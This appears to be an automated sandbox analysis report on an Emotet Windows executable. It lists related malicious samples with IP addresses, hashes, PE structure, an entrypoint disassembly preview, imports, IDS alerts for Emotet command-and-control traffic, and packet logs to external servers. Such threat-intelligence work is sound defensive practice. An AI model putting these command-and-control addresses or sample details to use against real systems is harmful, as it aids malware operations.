TELECABLESpainES	ExeFile (226).exe	Get hash	malicious	Emotet	Browse	85.152.162.105
	ExeFile (145).exe	Get hash	malicious	Emotet	Browse	85.152.162.105
	ExeFile (156).exe	Get hash	malicious	Emotet	Browse	85.152.162.105
	ExeFile (171).exe	Get hash	malicious	Emotet	Browse	93.156.165.186
	ExeFile (196).exe	Get hash	malicious	Emotet	Browse	85.152.162.105
	ExeFile (106).exe	Get hash	malicious	Emotet	Browse	85.152.162.105
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	188.171.114.252
	arm7.elf	Get hash	malicious	Mirai	Browse	188.171.226.33
	SZwdzMMRBU.elf	Get hash	malicious	Unknown	Browse	85.152.244.213
	VapIQOTGj7.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	212.89.7.12
xneeloZA	ExeFile (145).exe	Get hash	malicious	Emotet	Browse	169.239.182.217
	ExeFile (156).exe	Get hash	malicious	Emotet	Browse	169.239.182.217
	ExeFile (171).exe	Get hash	malicious	Emotet	Browse	169.239.182.217
	ExeFile (196).exe	Get hash	malicious	Emotet	Browse	169.239.182.217
	https://www.117onstrand.com/wp-content/uploads/2021/08/Ingenuit	Get hash	malicious	Unknown	Browse	129.232.138.186
	http://www.dhleoyssa.com/	Get hash	malicious	Unknown	Browse	129.232.249.151
	154.216.17.9-skid.arm5-2024-08-04T06_23_00.elf	Get hash	malicious	Mirai, Moobot	Browse	156.38.239.184
	154.216.17.9-skid.arm7-2024-08-04T06_23_04.elf	Get hash	malicious	Mirai, Moobot	Browse	197.221.56.201
	154.216.17.9-skid.mips-2024-08-04T06_23_09.elf	Get hash	malicious	Mirai, Moobot	Browse	41.203.15.61
	77.90.35.9-skid.arm5-2024-07-30T07_10_52.elf	Get hash	malicious	Mirai, Moobot	Browse	156.38.239.187
DU-AS1AE	ExeFile (377).exe	Get hash	malicious	Emotet	Browse	91.75.75.46
	ExeFile (384).exe	Get hash	malicious	Emotet	Browse	94.206.45.18
	ExeFile (39).exe	Get hash	malicious	Emotet	Browse	91.75.75.46
	ExeFile (64).exe	Get hash	malicious	Emotet	Browse	91.75.75.46
	ExeFile (22).exe	Get hash	malicious	Emotet	Browse	94.200.114.161
	ExeFile (285).exe	Get hash	malicious	Emotet	Browse	91.75.75.46
	ExeFile (226).exe	Get hash	malicious	Emotet	Browse	94.200.114.161
	ExeFile (145).exe	Get hash	malicious	Emotet	Browse	94.200.114.161
	ExeFile (196).exe	Get hash	malicious	Emotet	Browse	94.200.114.161
	ExeFile (106).exe	Get hash	malicious	Emotet	Browse	94.200.114.161

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.492367377389432
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ExeFile (360).exe
File size:	536'576 bytes
MD5:	8e2bdd409a89cbb6b5eb424e9d1bda34
SHA1:	f8e82cca5dbb430bafd16b516f6e97cdb754ba72
SHA256:	297556d0ee81785209ae8464a2e8665271dfb03b2d321531d7d82804549b54e6
SHA512:	489cfda09d79e33bc0ce1e8b96f4d2f04d6c21b5babc78d6594df3e8a913558a6dce6b027d42cbf4bf23f7e044a413158c63dd1b4f10da25630d0e36947c4baf
SSDEEP:	12288:pdZN7lYBPWkuaYWdm7/PC4ox9XUQz8h4RmAwV:pEKZWdm7/4UKmA
TLSH:	3FB49E0675F1C0B6DA6251700EA7EB79A6F6EAA04E325AC733E4DF1D2D324C19736321
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.JQ4..Q4..Q4...+..t4..3+..E4..Q4..^6...(..O4...+...4...(..@4..Q4...4...+...4...2..P4...+..P4..RichQ4..................PE..L..

File Icon


Icon Hash:	0715150763697373

Static PE Info

General

Entrypoint:	0x41aa65
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5F620186 [Wed Sep 16 12:13:58 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	59c9e75ee4eabfac7b59b8e95fe09e60

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0045BFF8h
push 00420B00h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [004553DCh]
xor edx, edx
mov dl, ah
mov dword ptr [0046D708h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0046D704h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0046D700h], ecx
shr eax, 10h
mov dword ptr [0046D6FCh], eax
push 00000001h
call 00007F836CB6FAD1h
pop ecx
test eax, eax
jne 00007F836CB6BF0Ah
push 0000001Ch
call 00007F836CB6BFC8h
pop ecx
call 00007F836CB6F7FCh
test eax, eax
jne 00007F836CB6BF0Ah
push 00000010h
call 00007F836CB6BFB7h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F836CB71D56h
call dword ptr [00455258h]
mov dword ptr [0046F268h], eax
call 00007F836CB71C14h
mov dword ptr [0046D6ACh], eax
call 00007F836CB719BDh
call 00007F836CB718FFh
call 00007F836CB6DAD8h
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0045525Ch]
call 00007F836CB71890h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F836CB6BF08h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[IMP] VS97 (5.0) SP3 link 5.10.7303
[C++] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x67ae0	0x66	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x65298	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x16b40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x55000	0x7d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x533c5	0x54000	42e8e31b117b9310239ec5bf9cfa8a91	False	0.5667521158854166	data	6.522813581511489	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x55000	0x12b46	0x13000	06ae47d32a6944fe9eed9199ce16307d	False	0.30184775904605265	data	4.51358625189594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x68000	0x7da8	0x4000	22643ecde486ef4b17f2e86004fa91a4	False	0.3021240234375	data	4.286416468261844	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x70000	0x16b40	0x17000	ab9b255bf045cc98bd5497e81292c7dc	False	0.7499575407608695	data	7.011404840123517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x827e0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4805194805194805
RT_CURSOR	0x82918	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	English	United States	0.7
RT_CURSOR	0x829f8	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x82b30	0xb4	Targa image data - RLE 32 x 65536 x 1 +16 "\001"	English	United States	0.5944444444444444
RT_CURSOR	0x82c10	0x134	AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.32142857142857145
RT_CURSOR	0x82d48	0xb4	Targa image data - RLE 32 x 65536 x 1 +16 "\001"	English	United States	0.49444444444444446
RT_CURSOR	0x82e28	0x134	AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\360\037\377\377\370?\377\377\374\177\377\377\376\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.33766233766233766
RT_CURSOR	0x82f60	0xb4	Targa image data - RLE 32 x 65536 x 1 +16 "\001"	English	United States	0.5
RT_CURSOR	0x83040	0x134	AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	English	United States	0.5616883116883117
RT_CURSOR	0x83178	0xb4	Targa image data - RLE 32 x 65536 x 1 +16 "\001"	English	United States	0.5444444444444444
RT_CURSOR	0x83c98	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.4025974025974026
RT_CURSOR	0x83dd0	0xb4	data	English	United States	0.55
RT_BITMAP	0x81198	0x1d0	Device independent bitmap graphic, 48 x 15 x 4, image size 360	English	United States	0.44612068965517243
RT_BITMAP	0x83258	0x5e4	Device independent bitmap graphic, 70 x 39 x 4, image size 1404	English	United States	0.34615384615384615
RT_BITMAP	0x83928	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	English	United States	0.44565217391304346
RT_BITMAP	0x839e0	0x16c	Device independent bitmap graphic, 39 x 13 x 4, image size 260	English	United States	0.28296703296703296
RT_BITMAP	0x83b50	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	English	United States	0.37962962962962965
RT_ICON	0x70ff0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.31989247311827956
RT_ICON	0x712f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.3208092485549133
RT_ICON	0x71870	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.3872832369942196
RT_ICON	0x80928	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.31989247311827956
RT_ICON	0x80c10	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5135135135135135
RT_ICON	0x80d60	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.2540322580645161
RT_ICON	0x81048	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.4560810810810811
RT_ICON	0x81910	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	French	France	0.5295698924731183
RT_ICON	0x81f20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Italian	Italy	0.3312274368231047
RT_MENU	0x81378	0xd0	data	English	United States	0.6826923076923077
RT_MENU	0x81c10	0x4e	data	French	France	0.9230769230769231
RT_DIALOG	0x814b8	0x13e	data	English	United States	0.6194968553459119
RT_DIALOG	0x81c60	0x2bc	data	French	France	0.48857142857142855
RT_DIALOG	0x83840	0xe8	data	English	United States	0.6336206896551724
RT_DIALOG	0x83eb0	0x11e	data	English	United States	0.5174825174825175
RT_DIALOG	0x83fd0	0x15a	data	English	United States	0.5057803468208093
RT_STRING	0x84260	0x34	data	English	United States	0.5769230769230769
RT_STRING	0x84148	0x112	data	English	United States	0.48175182481751827
RT_STRING	0x853d8	0xd6	data	English	United States	0.5
RT_STRING	0x854b0	0x84	data	French	France	0.5
RT_STRING	0x84298	0x40	data	English	United States	0.671875
RT_STRING	0x84320	0x296	data	English	United States	0.3323262839879154
RT_STRING	0x846c0	0x260	data	English	United States	0.0805921052631579
RT_STRING	0x84a70	0x328	data	English	United States	0.34405940594059403
RT_STRING	0x84a00	0x70	data	English	United States	0.625
RT_STRING	0x845b8	0x106	data	English	United States	0.5763358778625954
RT_STRING	0x84920	0xda	data	English	United States	0.43119266055045874
RT_STRING	0x842d8	0x46	data	English	United States	0.7428571428571429
RT_STRING	0x84d98	0xf6	data	English	United States	0.47560975609756095
RT_STRING	0x851c8	0x210	data	English	United States	0.3977272727272727
RT_STRING	0x84e90	0x1f8	data	English	United States	0.36706349206349204
RT_STRING	0x85088	0x86	data	English	United States	0.6567164179104478
RT_STRING	0x85110	0xb2	StarOffice Gallery theme p, 1929408256 objects, 1st p	English	United States	0.6741573033707865
RT_STRING	0x85538	0x2a	data	English	United States	0.5476190476190477
RT_STRING	0x85568	0x14a	data	English	United States	0.5060606060606061
RT_STRING	0x86a18	0x124	data	English	United States	0.4897260273972603
RT_STRING	0x856b8	0x4e2	data	English	United States	0.376
RT_STRING	0x85f30	0x2a2	data	English	United States	0.28338278931750743
RT_STRING	0x85c50	0x2dc	data	English	United States	0.36885245901639346
RT_STRING	0x85ba0	0xac	data	English	United States	0.45348837209302323
RT_STRING	0x86908	0xde	data	English	United States	0.536036036036036
RT_STRING	0x861d8	0x4c4	data	English	United States	0.3221311475409836
RT_STRING	0x866a0	0x264	data	English	United States	0.3741830065359477
RT_STRING	0x869e8	0x2c	data	English	United States	0.5227272727272727
RT_ACCELERATOR	0x81448	0x70	data	English	United States	0.6785714285714286
RT_ACCELERATOR	0x84130	0x18	data	English	United States	1.2083333333333333
RT_GROUP_CURSOR	0x829d0	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0294117647058822
RT_GROUP_CURSOR	0x83e88	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0294117647058822
RT_GROUP_CURSOR	0x82be8	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0294117647058822
RT_GROUP_CURSOR	0x82e00	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0294117647058822
RT_GROUP_CURSOR	0x83018	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0
RT_GROUP_CURSOR	0x83230	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States	1.0294117647058822
RT_GROUP_ICON	0x80d38	0x22	data	English	United States	1.0294117647058822
RT_GROUP_ICON	0x81170	0x22	data	English	United States	1.0588235294117647
RT_GROUP_ICON	0x81bf8	0x14	data	French	France	1.25
RT_GROUP_ICON	0x827c8	0x14	data	Italian	Italy	1.25
RT_GROUP_ICON	0x712d8	0x14	data			1.2
RT_GROUP_ICON	0x71dd8	0x14	data			1.25
RT_GROUP_ICON	0x71858	0x14	data			1.25
RT_VERSION	0x815f8	0x314	data	English	United States	0.44543147208121825
None	0x71df0	0xeb33	DOS executable (COM)			1.0004318147846738
None	0x81368	0xe	data	English	United States	1.5714285714285714

Imports

DLL	Import
ODBC32.dll
KERNEL32.dll	GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, Sleep, IsBadReadPtr, IsBadCodePtr, FreeEnvironmentStringsW, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, FreeEnvironmentStringsA, GetProfileStringA, InterlockedExchange, CopyFileA, FreeConsole, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsBadWritePtr, VirtualAlloc, VirtualFree, HeapCreate, HeapDestroy, HeapSize, HeapReAlloc, TerminateProcess, GetACP, GetSystemTime, GetTimeZoneInformation, ExitProcess, GetCommandLineA, GetStartupInfoA, RaiseException, HeapFree, HeapAlloc, RtlUnwind, GetTickCount, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetCurrentDirectoryA, GetShortPathNameA, GetThreadLocale, GetStringTypeExA, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GetCurrentProcess, DuplicateHandle, GetOEMCP, GetCPInfo, SizeofResource, GetProcessVersion, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalFlags, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, GetFileAttributesA, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, GlobalAlloc, GetCurrentThread, lstrcmpA, FileTimeToLocalFileTime, FileTimeToSystemTime, lstrcmpiA, GetModuleHandleA, lstrcatA, GlobalGetAtomNameA, lstrcpyA, GlobalLock, GlobalUnlock, GlobalFree, WideCharToMultiByte, lstrlenA, InterlockedDecrement, InterlockedIncrement, GetSystemDirectoryA, CreateFileA, GetFileSize, CloseHandle, MoveFileExA, LocalAlloc, LocalLock, LocalUnlock, GetModuleHandleW, GetLocalTime, GetProcAddress, LoadLibraryA, FreeLibrary, lstrcpynA, MultiByteToWideChar, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, GetCurrentThreadId, SetLastError, FindResourceA, LoadResource, LockResource, MulDiv, GetLastError, FormatMessageA, LocalFree, GetVersion, GetVersionExA, GetModuleFileNameA
USER32.dll	SendDlgItemMessageA, MapWindowPoints, DispatchMessageA, ScreenToClient, DeferWindowPos, ScrollWindow, GetScrollInfo, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, IsChild, RegisterClassA, GetWindowTextLengthA, GetWindowTextA, DefWindowProcA, GetClassLongA, GetMessageTime, GetWindowPlacement, IsIconic, GetFocus, InvalidateRect, UnpackDDElParam, ReuseDDElParam, WinHelpA, SetMenu, SetFocus, GetWindow, SetCursor, PeekMessageA, LoadAcceleratorsA, RegisterWindowMessageA, RedrawWindow, SetWindowPos, DefMDIChildProcA, TranslateAcceleratorA, TranslateMDISysAccel, DefFrameProcA, CreateWindowExA, BringWindowToTop, AdjustWindowRectEx, InvertRect, ReleaseCapture, ClientToScreen, GetCapture, SetCapture, GetKeyState, PtInRect, GetForegroundWindow, GetLastActivePopup, LoadCursorA, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetDlgItem, IsWindowEnabled, BeginDeferWindowPos, EndDeferWindowPos, GetDlgCtrlID, DestroyCursor, IsWindowVisible, SetParent, SetRectEmpty, wsprintfA, GetCursorPos, PostThreadMessageA, PostMessageA, LoadMenuA, SetMenuDefaultItem, KillTimer, SetTimer, DestroyMenu, CallNextHookEx, GetClassNameA, SetPropA, GetDCEx, CallWindowProcA, GetPropA, RemovePropA, UnhookWindowsHookEx, SetWindowsHookExA, GetParent, GetWindowDC, ReleaseDC, IntersectRect, IsRectEmpty, DestroyIcon, DeleteMenu, DrawMenuBar, GetMenuState, SetScrollInfo, SendMessageA, UnregisterClassA, HideCaret, ShowCaret, ExcludeUpdateRgn, DefDlgProcA, IsWindowUnicode, IsWindow, GetSystemMenu, LoadIconA, GetMenuStringA, CreateMenu, CreatePopupMenu, GetDesktopWindow, LoadBitmapA, ModifyMenuA, InsertMenuA, AppendMenuA, DrawEdge, SetRect, FillRect, DrawFocusRect, GetMessagePos, DrawStateA, GetSystemMetrics, InflateRect, GetSysColor, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetMenuItemInfoA, IsMenu, GetDC, EqualRect, GetMenu, WindowFromDC, CopyRect, OffsetRect, SystemParametersInfoA, MessageBoxA, GetWindowRect, GetClassInfoA, RemoveMenu, UpdateWindow, ShowWindow, FindWindowA, SetForegroundWindow, GetWindowLongA, SetWindowLongA, GetClientRect, EnableWindow, RegisterClipboardFormatA, MessageBeep, GetNextDlgGroupItem, CopyAcceleratorTableA, CharNextA, CharUpperA, GetTabbedTextExtentA, LockWindowUpdate, GetSysColorBrush, WindowFromPoint, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, SetCursorPos, IsZoomed, MapDialogRect, SetWindowContextHelpId, GetMessageA, TranslateMessage, ValidateRect, ShowOwnedPopups, PostQuitMessage, LoadStringA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, MoveWindow, SetWindowTextA, IsDialogMessageA, TrackPopupMenu, SetDlgItemTextA
GDI32.dll	GetCharWidthA, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, DeleteObject, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreatePatternBrush, PtVisible, RectVisible, TextOutA, Escape, GetMapMode, SetRectRgn, CombineRgn, LPtoDP, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, StretchDIBits, CreateRectRgnIndirect, CreateBitmap, DeleteDC, CreateDCA, SetAbortProc, StartDocA, StartPage, EndPage, EndDoc, AbortDoc, GetViewportOrgEx, CreatePen, DPtoLP, GetStockObject, PatBlt, GetDeviceCaps, SetBkColor, SetTextColor, GetClipBox, ExtTextOutA, SelectObject, GetTextMetricsA, BitBlt, GetPixel, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetPixel, Rectangle, CreateFontIndirectA, CreateSolidBrush, CreateFontA, RoundRect, CreateDIBitmap, GetTextExtentPointA, GetTextExtentPoint32A
comdlg32.dll	GetOpenFileNameA, GetSaveFileNameA, CommDlgExtendedError, PrintDlgA, GetFileTitleA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	SetFileSecurityA, RegCloseKey, RegSetValueExA, RegCreateKeyA, RegQueryValueExA, RegOpenKeyExA, RegConnectRegistryA, CloseServiceHandle, OpenServiceA, OpenSCManagerA, QueryServiceStatus, RegQueryValueA, RegEnumKeyA, RegOpenKeyA, RegSetValueA, GetFileSecurityA, CryptAcquireContextA, RegDeleteValueA, RegCreateKeyExA, RegDeleteKeyA
SHELL32.dll	SHGetFileInfoA, DragQueryFileA, DragFinish, Shell_NotifyIconA, SHGetMalloc, ExtractIconA
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_SetBkColor, ImageList_Draw, ImageList_GetIconSize, ImageList_GetIcon, ImageList_AddMasked, ImageList_Destroy, ImageList_Create
oledlg.dll
ole32.dll	OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, CoRevokeClassObject, OleFlushClipboard, OleIsCurrentClipboard
OLEPRO32.DLL
OLEAUT32.dll	SysFreeString, SysAllocStringLen, VariantClear, VariantCopy, SysAllocString, SysAllocStringByteLen, VariantChangeType, VariantTimeToSystemTime, SysStringLen
MSIMG32.dll	GradientFill

Exports

Name	Ordinal	Address
SDASQFddefgshdSSSgfdtEghfIITFDSSSSS	1	0x403500

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
French	France
Italian	Italy

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-20T17:48:31.137316+0200	TCP	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	49738	80	192.168.2.9	172.91.208.86
2024-08-20T17:46:36.956983+0200	TCP	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	49720	443	192.168.2.9	194.187.133.160
2024-08-20T17:48:06.769237+0200	TCP	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	49737	80	192.168.2.9	94.23.216.33
2024-08-20T17:48:02.355840+0200	TCP	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	49732	80	192.168.2.9	187.161.206.24
2024-08-20T17:47:38.403788+0200	TCP	2854388	ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13	1	49723	80	192.168.2.9	78.187.156.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 20, 2024 17:46:55.459446907 CEST	49707	80	192.168.2.9	74.219.172.26
Aug 20, 2024 17:46:55.466768980 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.466851950 CEST	49707	80	192.168.2.9	74.219.172.26
Aug 20, 2024 17:46:55.466995001 CEST	49707	80	192.168.2.9	74.219.172.26
Aug 20, 2024 17:46:55.467019081 CEST	49707	80	192.168.2.9	74.219.172.26
Aug 20, 2024 17:46:55.471929073 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.471976995 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.471987009 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.471996069 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.472148895 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:55.473526001 CEST	80	49707	74.219.172.26	192.168.2.9
Aug 20, 2024 17:46:59.249823093 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.255006075 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.256819963 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.259617090 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.259649038 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.261909962 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.261974096 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.262109041 CEST	49717	8080	192.168.2.9	134.209.36.254
Aug 20, 2024 17:46:59.264642954 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.264662027 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.264676094 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.264681101 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.264687061 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.267096996 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:46:59.267113924 CEST	8080	49717	134.209.36.254	192.168.2.9
Aug 20, 2024 17:47:02.896588087 CEST	49718	8080	192.168.2.9	104.156.59.7
Aug 20, 2024 17:47:02.945677996 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.945863008 CEST	49718	8080	192.168.2.9	104.156.59.7
Aug 20, 2024 17:47:02.946075916 CEST	49718	8080	192.168.2.9	104.156.59.7
Aug 20, 2024 17:47:02.946113110 CEST	49718	8080	192.168.2.9	104.156.59.7
Aug 20, 2024 17:47:02.950993061 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.951031923 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.951036930 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.951141119 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.951396942 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:02.951402903 CEST	8080	49718	104.156.59.7	192.168.2.9
Aug 20, 2024 17:47:06.255234957 CEST	49719	8080	192.168.2.9	120.138.30.150
Aug 20, 2024 17:47:06.260330915 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:06.260447025 CEST	49719	8080	192.168.2.9	120.138.30.150
Aug 20, 2024 17:47:06.260601997 CEST	49719	8080	192.168.2.9	120.138.30.150
Aug 20, 2024 17:47:06.260602951 CEST	49719	8080	192.168.2.9	120.138.30.150
Aug 20, 2024 17:47:06.265630007 CEST	8080	49719	120.138.30.150	192.168.2.9
Aug 20, 2024 17:47:06.265646935 CEST	8080	49719	120.138.30.150	192.168.2.9
